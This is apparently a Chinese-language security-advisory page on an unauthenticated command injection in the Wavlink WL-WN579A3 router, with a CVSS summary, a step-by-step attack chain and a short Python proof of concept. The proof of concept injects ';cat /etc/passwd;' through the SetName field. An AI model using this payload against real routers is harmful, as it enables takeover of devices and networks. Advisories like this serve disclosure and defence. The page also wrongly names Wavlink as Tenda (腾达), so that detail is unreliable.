CVE-2026-4163 CVSS 9.8 严重

CVE-2026-4163 Wavlink WL-WN579A3 路由器命令注入漏洞

披露日期: 2026-03-16

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4163

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wavlink WL-WN579A3

漏洞概述

CVE-2026-4163是Wavlink（腾达）WL-WN579A3无线路由器中存在的一个严重命令注入漏洞。该漏洞存在于Web管理界面的CGI脚本中，具体位于/cgi-bin/wireless.cgi文件的SetName和GuestWifi函数中。攻击者可以通过构造恶意的POST请求，在未经身份验证的情况下远程执行任意系统命令。由于该漏洞的CVSS评分高达9.8，属于极其严重的危急漏洞，且相关利用代码已公开，攻击者可轻松获取设备完全控制权。此漏洞影响使用220323版本固件的WL-WN579A3设备，攻击复杂度低，无需认证或用户交互即可实施攻击。

技术细节

该命令注入漏洞存在于Wavlink WL-WN579A3路由器的Web管理接口中。漏洞点位于/cgi-bin/wireless.cgi脚本的SetName和GuestWifi函数。攻击者通过POST请求向该端点发送包含恶意命令的参数，由于应用程序对用户输入缺乏充分的过滤和验证，攻击者注入的命令会被直接传递给系统shell执行。攻击者可以利用分号、反引号或管道等shell元字符来分隔和注入额外命令。由于该路由器的Web服务以root权限运行，攻击成功后将获得完全的系统控制权限，可执行任意命令、安装后门或窃取网络流量。攻击者可通过远程网络直接发起攻击，无需提前获取认证凭据。

攻击链分析

STEP 1

步骤1

攻击者识别目标Wavlink WL-WN579A3路由器，并确认其运行220323版本固件

STEP 2

步骤2

攻击者构造包含恶意命令的POST请求，目标是/cgi-bin/wireless.cgi端点

STEP 3

步骤3

在SetName或GuestWifi参数中注入系统命令，利用shell元字符如分号、反引号等绕过输入验证

STEP 4

步骤4

发送构造的请求到路由器Web管理接口，由于无需认证即可访问，攻击直接生效

STEP 5

步骤5

注入的命令在路由器系统上以root权限执行，攻击者获得完全控制权

STEP 6

步骤6

攻击者可部署后门、窃取数据、劫持网络流量或进一步横向渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-4163 PoC - Wavlink WL-WN579A3 Command Injection
# Target: /cgi-bin/wireless.cgi

target_ip = "192.168.0.1"  # Router IP
target_url = f"http://{target_ip}/cgi-bin/wireless.cgi"

# Payload to inject command (example: read /etc/passwd)
payload = ";cat /etc/passwd;"

data = {
    "SetName": payload,
    "goformId": "SET_WIFI_NAME"
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

Wavlink WL-WN579A3 固件版本 220323

防御指南

临时缓解措施

在官方补丁发布前，建议通过防火墙规则限制对路由器Web管理界面（80/443端口）的访问，仅允许受信任的IP地址访问管理后台。同时建议将路由器放置在网络隔离区域，减小潜在攻击影响范围。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表